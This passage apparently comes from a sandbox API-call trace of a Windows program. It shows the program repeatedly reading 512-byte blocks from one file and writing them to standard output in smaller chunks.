lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.849] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.849] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType 
(hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.850] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, 
lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] GetFileType (hFile=0x50) returned 0x1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, 
lpOverlapped=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.852] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.852] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] GetFileType (hFile=0x50) returned 0x1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] GetFileType (hFile=0x50) returned 0x1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.854] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.854] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] GetFileType (hFile=0x50) returned 0x1 [0136.854] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0136.854] GetFileType (hFile=0x50) returned 0x1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] GetFileType (hFile=0x50) returned 0x1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] GetFileType (hFile=0x50) returned 0x1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 
[0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.855] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.855] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.856] GetFileType (hFile=0x50) returned 0x1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, 
lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.856] GetFileType (hFile=0x50) returned 0x1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] GetFileType (hFile=0x50) returned 0x1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] GetFileType (hFile=0x50) returned 0x1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] GetFileType (hFile=0x50) returned 0x1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] GetFileType (hFile=0x50) returned 0x1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: 
lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.857] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.859] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.859] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] 
GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 
